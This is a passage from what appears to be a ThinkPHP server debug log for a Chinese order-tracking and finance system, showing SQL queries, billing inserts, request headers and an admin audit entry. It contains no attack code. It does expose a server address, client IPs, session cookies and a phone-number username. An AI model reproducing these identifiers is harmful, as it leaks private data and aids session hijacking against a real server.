productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1758' [ RunTime:0.002679s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=12000,`price`=2.33,`money`=27960 WHERE `id` = 3054 [ RunTime:0.007411s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001533s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001411s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 6610 , 1094 , 1758 , 3054 , 1 , 2022 , 7 , 20 , '100W-7底壳12000个' , 1658308434 , 27960 , 7834907.82) [ RunTime:0.004776s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=12000,`price`=1.4,`money`=16800 WHERE `id` = 3055 [ RunTime:0.004372s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001538s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 6611 , 1104 , 1758 , 3055 , 1 , 2022 , 7 , 20 , '100W-2上盖12000个' , 1658308434 , 16800 , 7851707.82) [ RunTime:0.004325s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=12000,`price`=0.06,`money`=720 WHERE `id` = 3056 [ RunTime:0.004131s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001367s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 6612 , 1021 , 1758 , 3056 , 1 , 2022 , 7 , 20 , '大平压板12000个' , 1658308434 , 720 , 7835627.82) [ RunTime:0.003932s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=12000,`price`=0.06,`money`=720 WHERE `id` = 3057 [ RunTime:0.005434s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001523s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 6613 , 1022 , 1758 , 3057 , 1 , 2022 , 7 , 20 , '大弯压板12000个' , 1658308434 , 720 , 7835627.82) [ RunTime:0.006038s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001529s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u738b\",\"154\"],\"verify_amount\":[\"12000\",\"12000\",\"12000\",\"12000\"],\"price\":[\"2.33\",\"1.4\",\"0.06\",\"0.06\"],\"money\":[\"27960\",\"16800\",\"720\",\"720\"],\"explain\":[\"100W-7\\u5e95\\u58f312000\\u4e2a\",\"100W-2\\u4e0a\\u76d612000\\u4e2a\",\"\\u5927\\u5e73\\u538b\\u677f12000\\u4e2a\",\"\\u5927\\u5f2f\\u538b\\u677f12000\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"ids\":\"1758\"}' , '/admin/financial/verifybill/hedui/ids/1758?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308434) [ RunTime:0.005400s ] --------------------------------------------------------------- [ 2022-07-20T17:13:54+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703526 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703526 [运行时间:0.073320s][吞吐率:13.64req/s] [内存消耗:5,678.98kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001073s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2022-06-20 00:00:00","end_time":"2022-07-20 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1658306703526', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001580s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000414s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001517s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000654s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001664s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001461s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.002018s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000477s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001492s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001362s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001086s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.003302s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.003236s ] --------------------------------------------------------------- [ 2022-07-20T17:14:16+08:00 ] 106.112.205.110 POST /api/users/getCaigouStaffs?userId=100 [ info ] 47.105.33.115:8081/api/users/getCaigouStaffs?userId=100 [运行时间:0.043666s][吞吐率:22.90req/s] [内存消耗:4,476.49kb] [文件加载:74] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.002020s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getCaigouStaffs', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001647s ] [ info ] [ RUN ] app\api\controller\Users->getCaigouStaffs[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000337s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001475s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001124s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '100' LIMIT 1 [ RunTime:0.000424s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `factorymge_id` = 40 AND `jobmge_id` = 8 [ RunTime:0.000394s ] --------------------------------------------------------------- [ 2022-07-20T17:14:16+08:00 ] 106.112.205.110 POST /api/users/getStaffs?staff_id=100 [ info ] 47.105.33.115:8081/api/users/getStaffs?staff_id=100 [运行时间:0.040453s][吞吐率:24.72req/s] [内存消耗:4,301.23kb] [文件加载:70] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001224s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getStaffs', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '100', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001729s ] [ info ] [ RUN ] app\api\controller\Users->getStaffs[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000438s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001467s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000310s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `factorymge_id` = 40 AND `staff_status` = '1' AND ( jobmge_id in (2) ) [ RunTime:0.000573s ] --------------------------------------------------------------- [ 2022-07-20T17:14:18+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021652s][吞吐率:46.18req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000063s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001220s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:18+08:00 ] 106.112.205.110 POST /api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=1&pageNum=10 [运行时间:0.066086s][吞吐率:15.13req/s] [内存消耗:4,914.50kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001296s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'shenhe' => '1', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001625s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000526s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001853s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000599s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001866s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001084s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1658308458>orderinfo.end_time desc,1658308458>orderinfo.end_time desc,1658308458-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.002640s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001521s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000358s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000285s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000243s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000413s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000384s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000351s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000277s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000348s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000396s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000287s ] --------------------------------------------------------------- [ 2022-07-20T17:14:18+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020079s][吞吐率:49.80req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => 